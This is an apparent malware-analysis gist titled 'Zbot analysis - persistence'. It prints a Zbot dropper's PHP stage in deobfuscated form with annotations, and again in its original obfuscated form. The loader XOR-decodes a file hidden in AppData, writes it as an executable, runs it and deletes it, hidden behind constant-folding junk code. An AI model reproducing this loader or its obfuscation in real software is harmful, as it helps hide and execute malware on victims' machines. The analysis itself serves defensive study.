
@hasherezade /deobfuscated.php Secret
Last active Jan 10, 2017

Zbot analysis - persistence
<?php
function _get_arr_value($index)
{
    // String table of the deobfuscated dropper. Entries 0 and 1 are XOR-encoded
    // file paths that the main script passes through decode(); entry 1 is entry 0
    // plus a four-byte suffix (the author's annotations in the main script give the
    // decoded values). Entries 2-7 are only referenced by the obfuscated variant's
    // dead branches or are assigned and never read.
    $encodedInputPath = "\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20";
    $table = [
        $encodedInputPath,                       // 0: encoded input path
        $encodedInputPath . "\xdd\x81\xc2\x2c",  // 1: encoded output path (input path + 4-byte suffix)
        'qsgfh',                                 // 2: assigned to $golkdbl, never read
        'ojetjlsjqbudwfx',                       // 3: strpos() haystack in the obfuscated variant
        'oktwz',                                 // 4: strpos() needle (no match, branch is dead)
        'ekuwdqoqcadeetv',                       // 5: strpos() haystack in unreachable code
        'nxz',                                   // 6: strpos() needle in unreachable code
        '',                                      // 7: seed for the decode output buffer
    ];

    // Out-of-range indices behave like the original: undefined-key warning, null result.
    return $table[$index];
}
?>
<?php
// --- Dropper stage (the author's deobfuscated reading of the obfuscated script further down) ---
// Reads an XOR-encoded file, decodes it with a rolling key, writes the result to a
// second path, executes it, then deletes the written file. For defenders: the only
// on-disk artifact of the payload is the output file, and it exists only between
// file_put_contents() and the unlink() loop below.
$key = -1388517416; // initial XOR key; the obfuscated variant builds the same value from round() sums
$erywquk = 3383; // assigned but never read in the visible code
$in_filename = _get_arr_value(0); // XOR-encoded input path
$out_filename = _get_arr_value(1); // XOR-encoded output path
$in_filename = decode($in_filename, $key);
# author's note, decoded value: $in_filename = "C:\Users\tester\AppData\Roaming\Vyaxy\royxh.umh"
$golkdbl = _get_arr_value(2); // assigned but never read in the visible code
$out_filename = decode($out_filename, $key);
$file_content = file_get_contents($in_filename); // false (plus a warning) if the input file cannot be read
# author's note, decoded value: $out_filename = "C:\Users\tester\AppData\Roaming\Vyaxy\royxh.umh.exe"
if ($file_content) { // also skipped when the file is empty ('' is falsy)
$decoded_content = decode($file_content, $key); // same key and routine as the path decoding above
file_put_contents($out_filename, $decoded_content);
exec($out_filename); // runs the decoded payload
while (!unlink($out_filename)) // retry deletion until it succeeds
Sleep(1); // one-second pause between attempts
}
function shift_decode($val, $and_val)
{
    // Key-mixing step used between decoded bytes: a rotate-left-like operation where
    // the shift amount is the low five bits of $and_val. The bits wrapped around from
    // the top are masked to the shift width, but the left shift itself is not
    // truncated to 32 bits, so on a 64-bit PHP build the result can exceed 32 bits.
    $shift = $and_val & 31;
    $shiftedUp = $val << $shift;
    $wrapMask = (1 << $shift) - 1;
    $wrapped = ($val >> (32 - $shift)) & $wrapMask;

    return $shiftedUp | $wrapped;
}
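function decode($in_buffer, $key)
{
    // XOR-decode $in_buffer with a rolling key. Each byte is XORed with the low byte
    // of $key; the key is then passed through shift_decode($key, 8) and incremented
    // before the next byte. An empty buffer yields ''.
    //
    // Fix: the original indexed the string with the {} offset syntax, which was
    // removed in PHP 8.0 (parse error); [] reads the same byte on every version.
    $out_buffer = '';
    $input_len = strlen($in_buffer); // byte length, which is what binary data needs

    for ($index = 0; $index < $input_len; ++$index) {
        // $key & 0xFF yields the low byte for negative keys as well (two's complement ints)
        $out_buffer .= chr(ord($in_buffer[$index]) ^ ($key & 0xFF));
        $key = shift_decode($key, 8);
        ++$key;
    }

    return $out_buffer;
}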
?>
<?php
// Function-name dispatch table of the obfuscated script, called as
// $GLOBALS['529399110'][i](...). The original assembles every name from string
// fragments; the resolved names are listed here. In the obfuscated code only
// indices 1, 2, 3, 6, 12, 14 and 15 are reached; the others sit in dead branches.
$GLOBALS['529399110'] = [
    'abs',               // 0
    'file_get_contents', // 1: reads the encoded input file
    'file_put_contents', // 2: writes the decoded payload
    'exec',              // 3: runs the written file
    'strpos',            // 4
    'socket_get_status', // 5
    'unlink',            // 6: deletes the written file
    'array_merge',       // 7
    'strpos',            // 8
    'imagefilter',       // 9
    'array_shift',       // 10
    'strptime',          // 11
    'strlen',            // 12: input length in the decode loop
    'ucfirst',           // 13
    'chr',               // 14: decode loop
    'ord',               // 15: decode loop
    'substr_replace',    // 16
    'substr_replace',    // 17
    'copy',              // 18
    'unlink',            // 19
];
?><?php
function _2136181597($fcvppx)
{
    // Obfuscated string table; identical contents to _get_arr_value(). Index 0 is the
    // XOR-encoded input path, index 1 the same bytes with a four-byte suffix (the
    // encoded output path), indices 2-6 are strpos() operands used only in dead or
    // unreachable branches, and index 7 seeds the decode output buffer.
    $encodedPath = "\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20";
    $entries = [];
    $entries[] = $encodedPath;
    $entries[] = $encodedPath . "\xdd\x81\xc2\x2c";
    $entries[] = 'qsgfh';
    $entries[] = 'ojetjlsjqbudwfx';
    $entries[] = 'oktwz';
    $entries[] = 'ekuwdqoqcadeetv';
    $entries[] = 'nxz';
    $entries[] = '';

    // Unknown indices produce the same undefined-key warning and null as the original.
    return $entries[$fcvppx];
}
?>
<?php
// Obfuscated form of the dropper stage above. Every round(0 + a + a + ...) expression is
// a constant; the folded values are given inline. Loops whose condition folds to 0 and
// the strpos() guard never execute, so the live path is: read, decode, write, exec, unlink.
$tmgwczl = -round(0 + 277703483.2 + 277703483.2 + 277703483.2 + 277703483.2 + 277703483.2); // -1388517416: the XOR key ($key above)
$erywquk = round(0 + 845.75 + 845.75 + 845.75 + 845.75); // 3383, never read
$pvkdnon = _2136181597(0); // encoded input path
while (round(0 + 278 + 278 + 278 + 278) - round(0 + 278 + 278 + 278 + 278)) // 1112 - 1112 = 0: body never runs
$GLOBALS['529399110'][0]($ehzfpai); // abs($ehzfpai), dead
$zzmnlgm = _2136181597(1); // encoded output path
$pvkdnon = girsztc($pvkdnon, $tmgwczl); // decode the input path
$golkdbl = _2136181597(2); // 'qsgfh', never read
$zzmnlgm = girsztc($zzmnlgm, $tmgwczl); // decode the output path
$dtpcqwi = $GLOBALS['529399110'][1]($pvkdnon); // file_get_contents(input path)
if ($dtpcqwi) { // false or '' skips the whole stage
$mauwmmh = girsztc($dtpcqwi, $tmgwczl); // decode the payload with the same key
$GLOBALS['529399110'][2]($zzmnlgm, $mauwmmh); // file_put_contents(output path, payload)
$GLOBALS['529399110'][3]($zzmnlgm); // exec(output path)
if ($GLOBALS['529399110'][4](_2136181597(3), _2136181597(4)) !== false) // strpos('ojetjlsjqbudwfx', 'oktwz'): no match, so false and the branch is dead
$GLOBALS['529399110'][5]($opberbw, $zzmnlgm); // socket_get_status(...), dead
while (!$GLOBALS['529399110'][6]($zzmnlgm)) // unlink(output path) until it succeeds
Sleep(round(0 + 0.5 + 0.5)); // sleep(1)
}
function vsqaxzw($ujxlctg, $cuvcjeb)
{
// Obfuscated shift_decode(): rotate-left-like key mixing with the shift amount taken
// from the low five bits of $cuvcjeb. Only the assignment and the return statement
// execute; the while loop folds to 0 and the trailing if follows the return.
$jedmsae = $cuvcjeb & round(0 + 7.75 + 7.75 + 7.75 + 7.75); // $cuvcjeb & 31
while (round(0 + 4457) - round(0 + 1114.25 + 1114.25 + 1114.25 + 1114.25)) // 4457 - 4457 = 0: body never runs
$GLOBALS['529399110'][7]($cuvcjeb, $ujxlctg, $dtpcqwi, $mauwmmh); // array_merge(...), dead
return ($ujxlctg << $jedmsae) | (($ujxlctg >> (round(0 + 16 + 16) - $jedmsae)) & ((round(0 + 0.5 + 0.5) << (round(0 + 7.75 + 7.75 + 7.75 + 7.75) & $jedmsae)) - round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2))); // ($v << $k) | (($v >> (32 - $k)) & ((1 << (31 & $k)) - 1))
if ($GLOBALS['529399110'][8](_2136181597(5), _2136181597(6)) !== false) // unreachable: after the return
$GLOBALS['529399110'][9]($opberbw); // imagefilter(...), unreachable
}
function girsztc($ehzfpai, $tmgwczl)
{
// Obfuscated decode(): XOR each byte of $ehzfpai with the low byte of the key $tmgwczl,
// then advance the key with vsqaxzw(key, 8) and ++ before the next byte. The if/while
// guards all fold to constants, so only the strlen() call and the loop body's first,
// fourth, sixth and seventh lines do any work.
$fnbzhld = _2136181597(7); // '' — the output buffer
if ((round(0 + 1.6666666666667 + 1.6666666666667 + 1.6666666666667) + round(0 + 405.75 + 405.75 + 405.75 + 405.75)) > round(0 + 1.25 + 1.25 + 1.25 + 1.25) || $GLOBALS['529399110'][10]($zzmnlgm)); // (5 + 1623) > 5 is true, so array_shift() is never evaluated; empty statement
else {
$GLOBALS['529399110'][11]($ehzfpai, $pvkdnon, $abwytbw); // strptime(...), dead
}
$abwytbw = $GLOBALS['529399110'][12]($ehzfpai); // strlen(input), byte count
while (round(0 + 15 + 15 + 15 + 15 + 15) - round(0 + 25 + 25 + 25)) // 75 - 75 = 0: body never runs
$GLOBALS['529399110'][13]($pvkdnon, $mauwmmh); // ucfirst(...), dead
for ($opberbw = round(0); $opberbw < $abwytbw; ++$opberbw) {
$xqnsess = $GLOBALS['529399110'][14]($GLOBALS['529399110'][15]($ehzfpai{$opberbw}) ^ ($tmgwczl & round(0 + 85 + 85 + 85))); // chr(ord(byte) ^ (key & 255)); the {} string offset no longer parses on PHP >= 8.0
if ((round(0 + 366 + 366 + 366 + 366 + 366) ^ round(0 + 610 + 610 + 610)) && $GLOBALS['529399110'][16]($tmgwczl, $mauwmmh, $ehzfpai)) // 1830 ^ 1830 = 0: dead
$GLOBALS['529399110'][17]($xqnsess, $ujxlctg); // substr_replace(...), dead
$fnbzhld .= $xqnsess; // append the decoded byte
if ((round(0 + 552 + 552 + 552) ^ round(0 + 1656)) && $GLOBALS['529399110'][18]($jedmsae, $opberbw)) // 1656 ^ 1656 = 0: dead
$GLOBALS['529399110'][19]($pvkdnon, $fnbzhld, $opberbw); // unlink(...), dead
$tmgwczl = vsqaxzw($tmgwczl, round(0 + 4 + 4)); // key = vsqaxzw(key, 8)
++$tmgwczl;
}
return $fnbzhld;
}
?>
<?php /* Original minified sample as recovered; the reformatted listing above is its line-by-line expansion. Four units follow in order: the function-name table, the string table _2136181597(), the dropper main body, and the two helpers vsqaxzw() (key mixing) and girsztc() (XOR decode). girsztc() uses the {} string offset syntax, which no longer parses on PHP >= 8.0. */ $GLOBALS['529399110']=Array('' .'abs','f' .'ile' .'_' .'ge' .'t' .'_c' .'o' .'ntents','file_put' .'_content' .'s','exec','strpos','' .'so' .'cke' .'t_get_sta' .'t' .'us','un' .'link','ar' .'ray_m' .'erge','strpos','im' .'agefilter','a' .'rray_sh' .'ift','s' .'t' .'rpti' .'me','strl' .'e' .'n','u' .'c' .'f' .'irst','' .'ch' .'r','ord','s' .'ubs' .'t' .'r' .'_re' .'place','su' .'bstr_re' .'p' .'lac' .'e','copy','un' .'l' .'ink'); ?><?php /* string table */ function _2136181597($fcvppx){$fcfeek=Array("\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20","\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20\xdd\x81\xc2\x2c",'qsgfh','ojetjlsjqbudwfx','oktwz','ekuwdqoqcadeetv','nxz','');return $fcfeek[$fcvppx];} ?><?php /* dropper main body: read, decode, write, exec, unlink */ $tmgwczl=-round(0+277703483.2+277703483.2+277703483.2+277703483.2+277703483.2);$erywquk=round(0+845.75+845.75+845.75+845.75);$pvkdnon=_2136181597(0);while(round(0+278+278+278+278)-round(0+278+278+278+278))$GLOBALS['529399110'][0]($ehzfpai);$zzmnlgm=_2136181597(1);$pvkdnon=girsztc($pvkdnon,$tmgwczl);$golkdbl=_2136181597(2);$zzmnlgm=girsztc($zzmnlgm,$tmgwczl);$dtpcqwi=$GLOBALS['529399110'][1]($pvkdnon);if($dtpcqwi){$mauwmmh=girsztc($dtpcqwi,$tmgwczl);$GLOBALS['529399110'][2]($zzmnlgm,$mauwmmh);$GLOBALS['529399110'][3]($zzmnlgm);if($GLOBALS['529399110'][4](_2136181597(3),_2136181597(4))!==false)$GLOBALS['529399110'][5]($opberbw,$zzmnlgm);while(!$GLOBALS['529399110'][6]($zzmnlgm))Sleep(round(0+0.5+0.5));}/* key mixing, see shift_decode() above */function vsqaxzw($ujxlctg,$cuvcjeb){$jedmsae=$cuvcjeb&round(0+7.75+7.75+7.75+7.75);while(round(0+4457)-round(0+1114.25+1114.25+1114.25+1114.25))$GLOBALS['529399110'][7]($cuvcjeb,$ujxlctg,$dtpcqwi,$mauwmmh);return($ujxlctg << $jedmsae)|(($ujxlctg 
>>(round(0+16+16)-$jedmsae))&((round(0+0.5+0.5)<<(round(0+7.75+7.75+7.75+7.75)&$jedmsae))-round(0+0.2+0.2+0.2+0.2+0.2)));if($GLOBALS['529399110'][8](_2136181597(5),_2136181597(6))!==false)$GLOBALS['529399110'][9]($opberbw);}/* XOR decode, see decode() above */function girsztc($ehzfpai,$tmgwczl){$fnbzhld=_2136181597(7);if((round(0+1.6666666666667+1.6666666666667+1.6666666666667)+round(0+405.75+405.75+405.75+405.75))>round(0+1.25+1.25+1.25+1.25)|| $GLOBALS['529399110'][10]($zzmnlgm));else{$GLOBALS['529399110'][11]($ehzfpai,$pvkdnon,$abwytbw);}$abwytbw=$GLOBALS['529399110'][12]($ehzfpai);while(round(0+15+15+15+15+15)-round(0+25+25+25))$GLOBALS['529399110'][13]($pvkdnon,$mauwmmh);for($opberbw=round(0);$opberbw<$abwytbw;++$opberbw){$xqnsess=$GLOBALS['529399110'][14]($GLOBALS['529399110'][15]($ehzfpai{$opberbw})^($tmgwczl&round(0+85+85+85)));if((round(0+366+366+366+366+366)^round(0+610+610+610))&& $GLOBALS['529399110'][16]($tmgwczl,$mauwmmh,$ehzfpai))$GLOBALS['529399110'][17]($xqnsess,$ujxlctg);$fnbzhld .= $xqnsess;if((round(0+552+552+552)^round(0+1656))&& $GLOBALS['529399110'][18]($jedmsae,$opberbw))$GLOBALS['529399110'][19]($pvkdnon,$fnbzhld,$opberbw);$tmgwczl=vsqaxzw($tmgwczl,round(0+4+4));++$tmgwczl;}return $fnbzhld;} ?>